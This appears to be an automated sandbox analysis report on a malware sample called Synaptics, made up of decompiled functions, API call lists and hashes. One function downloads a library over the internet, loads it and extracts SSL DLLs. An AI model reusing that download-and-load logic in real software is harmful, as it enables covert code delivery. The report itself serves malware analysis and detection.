                                                                                                                                                                                                                            0x004573a6
                                                                                                                                                                                                                            0x004573b2
                                                                                                                                                                                                                            0x004573cd
                                                                                                                                                                                                                            0x004573d2
                                                                                                                                                                                                                            0x004573d2
                                                                                                                                                                                                                            0x004573b4
                                                                                                                                                                                                                            0x004573b7
                                                                                                                                                                                                                            0x004573b7
                                                                                                                                                                                                                            0x004573da
                                                                                                                                                                                                                            0x004573e0
                                                                                                                                                                                                                            0x004573e4
                                                                                                                                                                                                                            0x004573f9
                                                                                                                                                                                                                            0x00457401
                                                                                                                                                                                                                            0x0045740f
                                                                                                                                                                                                                            0x00457413
                                                                                                                                                                                                                            0x00457413
                                                                                                                                                                                                                            0x00457418
                                                                                                                                                                                                                            0x0045741b
                                                                                                                                                                                                                            0x0045741e
                                                                                                                                                                                                                            0x0045742b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCapture.USER32 ref: 004572B5
                                                                                                                                                                                                                            • GetCapture.USER32 ref: 004572C4
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004572CA
                                                                                                                                                                                                                            • ReleaseCapture.USER32(00000000,0045750C), ref: 004572CF
                                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 004572F6
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0045738C
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 004573F9
                                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 00457408
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                                                                                                            • String ID: H/B
                                                                                                                                                                                                                            • API String ID: 862346643-184950203
                                                                                                                                                                                                                            • Opcode ID: 566df20a72b61cb5c56fc7dfe32d7b76f6e3c22f5e7dbfb110a8999abcf3f90f
                                                                                                                                                                                                                            • Instruction ID: 07b1c62a38d4c59f35ab2a161c95611ba83c65b292c9824363ed57e20a3288b5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 566df20a72b61cb5c56fc7dfe32d7b76f6e3c22f5e7dbfb110a8999abcf3f90f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19512E34A04244EFDB10EF6AD946F9A77F1EB49704F1580BAF800A73A2D778AD44DB49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00495084 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 101libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                                                                            			E00495084(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t55;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t79;
				struct HINSTANCE__* _t82;
				void* _t84;
				intOrPtr _t87;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(_t87);
				_push(0x4951d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87;
				_t84 = 3;
				_t55 = 0x49f0f4;
				do {
					if( *_t55 == 0) {
						goto L5;
					} else {
						_t68 =  *0x49f100; // 0x0
						E00404CCC( &_v12, "\\SSLLibrary.ddl", _t68);
						if(E00474D50( *_t55, _t55, _v12, _t84) == 0) {
							_v5 = 0;
							goto L5;
						} else {
							_v5 = 1;
							_t72 =  *0x49f100; // 0x0
							E00404CCC( &_v16, "\\SSLLibrary.ddl", _t72);
							_t82 = LoadLibraryA(E00404E80(_v16));
							_t56 = E0041E0D0(_t82, 1, 0xa, "LIBEAY32");
							_t74 =  *0x49f100; // 0x0
							E00404CCC( &_v20, "\\libeay32.dll", _t74);
							E0041DD9C(_t30, _t56, _v20, _t82);
							E00403BEC(_t56);
							_t57 = E0041E0D0(_t82, 1, 0xa, "SSLEAY32");
							_t8 =  &_v24; // 0x495430
							_t77 =  *0x49f100; // 0x0
							E00404CCC(_t8, "\\ssleay32.dll", _t77);
							_t9 =  &_v24; // 0x495430
							E0041DD9C(_t38, _t57,  *_t9, _t82);
							E00403BEC(_t57);
							FreeLibrary(_t82);
							_t79 =  *0x49f100; // 0x0
							E00404CCC( &_v32, "\\SSLLibrary.ddl", _t79);
							E00404BB8( &_v28, E00404E80(_v32));
							E00409BAC(_v28);
						}
					}
					break;
					L5:
					_t55 = _t55 + 4;
					_t84 = _t84 - 1;
				} while (_t84 != 0);
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(0x4951db);
				return E004049E4( &_v32, 6);
			}




















                                                                                                                                                                                                                            0x00495089
                                                                                                                                                                                                                            0x0049508a
                                                                                                                                                                                                                            0x0049508b
                                                                                                                                                                                                                            0x0049508c
                                                                                                                                                                                                                            0x0049508d
                                                                                                                                                                                                                            0x0049508e
                                                                                                                                                                                                                            0x0049508f
                                                                                                                                                                                                                            0x00495090
                                                                                                                                                                                                                            0x00495091
                                                                                                                                                                                                                            0x00495095
                                                                                                                                                                                                                            0x00495096
                                                                                                                                                                                                                            0x0049509b
                                                                                                                                                                                                                            0x0049509e
                                                                                                                                                                                                                            0x004950a1
                                                                                                                                                                                                                            0x004950a6
                                                                                                                                                                                                                            0x004950ab
                                                                                                                                                                                                                            0x004950ae
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004950b4
                                                                                                                                                                                                                            0x004950bc
                                                                                                                                                                                                                            0x004950c2
                                                                                                                                                                                                                            0x004950d3
                                                                                                                                                                                                                            0x004951ab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004950d9
                                                                                                                                                                                                                            0x004950d9
                                                                                                                                                                                                                            0x004950e5
                                                                                                                                                                                                                            0x004950eb
                                                                                                                                                                                                                            0x004950fe
                                                                                                                                                                                                                            0x00495115
                                                                                                                                                                                                                            0x0049511f
                                                                                                                                                                                                                            0x00495125
                                                                                                                                                                                                                            0x0049512f
                                                                                                                                                                                                                            0x00495136
                                                                                                                                                                                                                            0x00495150
                                                                                                                                                                                                                            0x00495152
                                                                                                                                                                                                                            0x0049515a
                                                                                                                                                                                                                            0x00495160
                                                                                                                                                                                                                            0x00495165
                                                                                                                                                                                                                            0x0049516a
                                                                                                                                                                                                                            0x00495171
                                                                                                                                                                                                                            0x00495177
                                                                                                                                                                                                                            0x00495184
                                                                                                                                                                                                                            0x0049518a
                                                                                                                                                                                                                            0x0049519c
                                                                                                                                                                                                                            0x004951a4
                                                                                                                                                                                                                            0x004951a4
                                                                                                                                                                                                                            0x004950d3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004951af
                                                                                                                                                                                                                            0x004951af
                                                                                                                                                                                                                            0x004951b2
                                                                                                                                                                                                                            0x004951b2
                                                                                                                                                                                                                            0x004951bb
                                                                                                                                                                                                                            0x004951be
                                                                                                                                                                                                                            0x004951c1
                                                                                                                                                                                                                            0x004951d3

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetOpenUrlA.WININET(00000001,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetCloseHandle.WININET(?), ref: 00474E6E
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0049528F), ref: 004950F9
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,0000000A,SSLEAY32,0000000A,LIBEAY32,00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00495177
                                                                                                                                                                                                                              • Part of subcall function 00409BAC: DeleteFileA.KERNEL32(00000000,?,0047618D,00000000,004761BC,?,00000000,?,004964CE,?,?,021E2A8C,021E2A8C,00000000,00000000,00000000), ref: 00409BB7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$FileLibraryOpen$CloseDeleteFreeHandleLoadRead
                                                                                                                                                                                                                            • String ID: 0TI$LIBEAY32$SSLEAY32$\SSLLibrary.ddl$\libeay32.dll$\ssleay32.dll
                                                                                                                                                                                                                            • API String ID: 1893608559-2441048562
                                                                                                                                                                                                                            • Opcode ID: 47dd40e21aa0a6f8e1a77457fa91ad782175ad0839c593cb5f4cff04c075f9e5
                                                                                                                                                                                                                            • Instruction ID: 33ec969f5ea1b72477d048da23142bfffb93f2672bd1290969d982d35f2b6f3b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47dd40e21aa0a6f8e1a77457fa91ad782175ad0839c593cb5f4cff04c075f9e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0319870B042049BDB01EB65DC82BAF7B75EB94304F20857BE901A7392DB7DAD05879C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040D058 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56filewindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040D058(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040CED0(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x49dc84; // 0x49e04c
				if( *_t14 == 0) {
					_t16 =  *0x49d864; // 0x407db4
					_t9 = _t16 + 4; // 0xffd2
					_t18 =  *0x49e668; // 0x400000
					LoadStringA(E00405FDC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x49d8f8; // 0x49e21c
				E004028C4(E00402FCC(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00409F88( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40d11c, 2,  &_v1092, 0);
			}












                                                                                                                                                                                                                            0x0040d067
                                                                                                                                                                                                                            0x0040d06c
                                                                                                                                                                                                                            0x0040d074
                                                                                                                                                                                                                            0x0040d0db
                                                                                                                                                                                                                            0x0040d0e0
                                                                                                                                                                                                                            0x0040d0e4
                                                                                                                                                                                                                            0x0040d0ef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040d105
                                                                                                                                                                                                                            0x0040d076
                                                                                                                                                                                                                            0x0040d080
                                                                                                                                                                                                                            0x0040d08f
                                                                                                                                                                                                                            0x0040d09f
                                                                                                                                                                                                                            0x0040d0b2
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                              • Part of subcall function 0040CED0: LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            • CharToOemA.USER32 ref: 0040D08F
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040D0AC
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0B2
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0C7
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040D0CD
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040D0EF
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 0040D105
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                            • String ID: LI
                                                                                                                                                                                                                            • API String ID: 185507032-1163166679
                                                                                                                                                                                                                            • Opcode ID: f6bc0104282aee26a15ec115454dfc7b83621b846d046f711f500fdc59f8e865
                                                                                                                                                                                                                            • Instruction ID: 7d08aee67cafa4939384a0f732e453422e0e0597bbcbc481209cf698103cc48d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6bc0104282aee26a15ec115454dfc7b83621b846d046f711f500fdc59f8e865
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC119EB2948205BAD200F7A5CC86F8F77ECAB54304F40463BB754E60E2DA78E844876B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043AB98 Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043AB98(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x43ad44; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x43ad3c; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x43ad44; // 0x0
				if(_t113 != (_t107 &  *0x43ad40)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x43ad44; // 0x0
				if(_t114 != (_t107 &  *0x43ad48)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E004250B0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00425094( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                                                                                                                                                                                                            0x0043ab9f
                                                                                                                                                                                                                            0x0043aba2
                                                                                                                                                                                                                            0x0043aba4
                                                                                                                                                                                                                            0x0043aba9
                                                                                                                                                                                                                            0x0043ad26
                                                                                                                                                                                                                            0x0043ad26
                                                                                                                                                                                                                            0x0043ad2b
                                                                                                                                                                                                                            0x0043ad38
                                                                                                                                                                                                                            0x0043ad38
                                                                                                                                                                                                                            0x0043abb3
                                                                                                                                                                                                                            0x0043abbd
                                                                                                                                                                                                                            0x0043abb5
                                                                                                                                                                                                                            0x0043abb5
                                                                                                                                                                                                                            0x0043abb5
                                                                                                                                                                                                                            0x0043abc6
                                                                                                                                                                                                                            0x0043abda
                                                                                                                                                                                                                            0x0043abc8
                                                                                                                                                                                                                            0x0043abd6
                                                                                                                                                                                                                            0x0043abd6
                                                                                                                                                                                                                            0x0043abe0
                                                                                                                                                                                                                            0x0043abf9
                                                                                                                                                                                                                            0x0043abe2
                                                                                                                                                                                                                            0x0043abf0
                                                                                                                                                                                                                            0x0043abf0
                                                                                                                                                                                                                            0x0043ac00
                                                                                                                                                                                                                            0x0043ac3a
                                                                                                                                                                                                                            0x0043ac3d
                                                                                                                                                                                                                            0x0043ac08
                                                                                                                                                                                                                            0x0043ac0b
                                                                                                                                                                                                                            0x0043ac2f
                                                                                                                                                                                                                            0x0043ac34
                                                                                                                                                                                                                            0x0043ac0d
                                                                                                                                                                                                                            0x0043ac1e
                                                                                                                                                                                                                            0x0043ac20
                                                                                                                                                                                                                            0x0043ac20
                                                                                                                                                                                                                            0x0043ac0b
                                                                                                                                                                                                                            0x0043ac44
                                                                                                                                                                                                                            0x0043ac49
                                                                                                                                                                                                                            0x0043ac8d
                                                                                                                                                                                                                            0x0043ac51
                                                                                                                                                                                                                            0x0043ac59
                                                                                                                                                                                                                            0x0043ac84
                                                                                                                                                                                                                            0x0043ac5b
                                                                                                                                                                                                                            0x0043ac70
                                                                                                                                                                                                                            0x0043ac70
                                                                                                                                                                                                                            0x0043ac59
                                                                                                                                                                                                                            0x0043aca5
                                                                                                                                                                                                                            0x0043acb3
                                                                                                                                                                                                                            0x0043acbb
                                                                                                                                                                                                                            0x0043acce
                                                                                                                                                                                                                            0x0043acce
                                                                                                                                                                                                                            0x0043acdc
                                                                                                                                                                                                                            0x0043ace4
                                                                                                                                                                                                                            0x0043acf7
                                                                                                                                                                                                                            0x0043acf7
                                                                                                                                                                                                                            0x0043ad01
                                                                                                                                                                                                                            0x0043ad21
                                                                                                                                                                                                                            0x0043ad21
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043ABD1
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043ABEB
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC19
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC2F
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC67
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC7F
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACC9
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACF2
                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043AD18
                                                                                                                                                                                                                              • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                                                                                                                                                                                            • Instruction ID: d10f16ddfd9cc23340e03066ebc6cedff9c8bd4490aae9a17c26e6f9981b1e60
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6518E70648744AFC320DB29C841B6BB7E9AF59304F04A81EB9D5C7792C63DEC508B1A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040E2E8 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E0040E2E8(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40e5b3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040E174();
				E0040CA14(__ebx, __edi, __esi);
				_t196 =  *0x49e750;
				if( *0x49e750 != 0) {
					E0040CBEC(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040C964(_t43, 0, 0x14,  &_v20);
				E00404A14(0x49e684, _v20);
				E0040C964(_t43, 0x40e5c8, 0x1b,  &_v24);
				 *0x49e688 = E00409664(0x40e5c8, 0, _t196);
				E0040C964(_t132, 0x40e5c8, 0x1c,  &_v28);
				 *0x49e689 = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68a = E0040C9B0(_t132, 0x2c, 0xf);
				 *0x49e68b = E0040C9B0(_t132, 0x2e, 0xe);
				E0040C964(_t132, 0x40e5c8, 0x19,  &_v32);
				 *0x49e68c = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68d = E0040C9B0(_t132, 0x2f, 0x1d);
				E0040C964(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040CC9C(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404A14(0x49e690, _v36);
				E0040C964(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040CC9C(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404A14(0x49e694, _v44);
				 *0x49e698 = E0040C9B0(_t132, 0x3a, 0x1e);
				E0040C964(_t132, 0x40e5fc, 0x28,  &_v52);
				E00404A14(0x49e69c, _v52);
				E0040C964(_t132, 0x40e608, 0x29,  &_v56);
				E00404A14(0x49e6a0, _v56);
				E004049C0( &_v12);
				E004049C0( &_v16);
				E0040C964(_t132, 0x40e5c8, 0x25,  &_v60);
				_t104 = E00409664(0x40e5c8, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00404A58( &_v8, 0x40e620);
				} else {
					E00404A58( &_v8, 0x40e614);
				}
				E0040C964(_t132, 0x40e5c8, 0x23,  &_v64);
				_t111 = E00409664(0x40e5c8, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040C964(_t132, 0x40e5c8, 0x1005,  &_v68);
					if(E00409664(0x40e5c8, 0, _t198) != 0) {
						E00404A58( &_v12, 0x40e63c);
					} else {
						E00404A58( &_v16, 0x40e62c);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404D40();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404D40();
				 *0x49e752 = E0040C9B0(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040E5BA);
				return E004049E4( &_v68, 0x10);
			}

























                                                                                                                                                                                                                            0x0040e2e8
                                                                                                                                                                                                                            0x0040e2e8
                                                                                                                                                                                                                            0x0040e2e9
                                                                                                                                                                                                                            0x0040e2eb
                                                                                                                                                                                                                            0x0040e2f0
                                                                                                                                                                                                                            0x0040e2f0
                                                                                                                                                                                                                            0x0040e2f2
                                                                                                                                                                                                                            0x0040e2f4
                                                                                                                                                                                                                            0x0040e2f4
                                                                                                                                                                                                                            0x0040e2f7
                                                                                                                                                                                                                            0x0040e2fa
                                                                                                                                                                                                                            0x0040e2fb
                                                                                                                                                                                                                            0x0040e300
                                                                                                                                                                                                                            0x0040e303
                                                                                                                                                                                                                            0x0040e306
                                                                                                                                                                                                                            0x0040e30b
                                                                                                                                                                                                                            0x0040e310
                                                                                                                                                                                                                            0x0040e317
                                                                                                                                                                                                                            0x0040e319
                                                                                                                                                                                                                            0x0040e319
                                                                                                                                                                                                                            0x0040e323
                                                                                                                                                                                                                            0x0040e332
                                                                                                                                                                                                                            0x0040e33f
                                                                                                                                                                                                                            0x0040e354
                                                                                                                                                                                                                            0x0040e363
                                                                                                                                                                                                                            0x0040e378
                                                                                                                                                                                                                            0x0040e387
                                                                                                                                                                                                                            0x0040e39a
                                                                                                                                                                                                                            0x0040e3ad
                                                                                                                                                                                                                            0x0040e3c2
                                                                                                                                                                                                                            0x0040e3d1
                                                                                                                                                                                                                            0x0040e3e4
                                                                                                                                                                                                                            0x0040e3f9
                                                                                                                                                                                                                            0x0040e404
                                                                                                                                                                                                                            0x0040e411
                                                                                                                                                                                                                            0x0040e426
                                                                                                                                                                                                                            0x0040e431
                                                                                                                                                                                                                            0x0040e43e
                                                                                                                                                                                                                            0x0040e451
                                                                                                                                                                                                                            0x0040e466
                                                                                                                                                                                                                            0x0040e473
                                                                                                                                                                                                                            0x0040e488
                                                                                                                                                                                                                            0x0040e495
                                                                                                                                                                                                                            0x0040e49d
                                                                                                                                                                                                                            0x0040e4a5
                                                                                                                                                                                                                            0x0040e4ba
                                                                                                                                                                                                                            0x0040e4c4
                                                                                                                                                                                                                            0x0040e4c9
                                                                                                                                                                                                                            0x0040e4cb
                                                                                                                                                                                                                            0x0040e4e4
                                                                                                                                                                                                                            0x0040e4cd
                                                                                                                                                                                                                            0x0040e4d5
                                                                                                                                                                                                                            0x0040e4d5
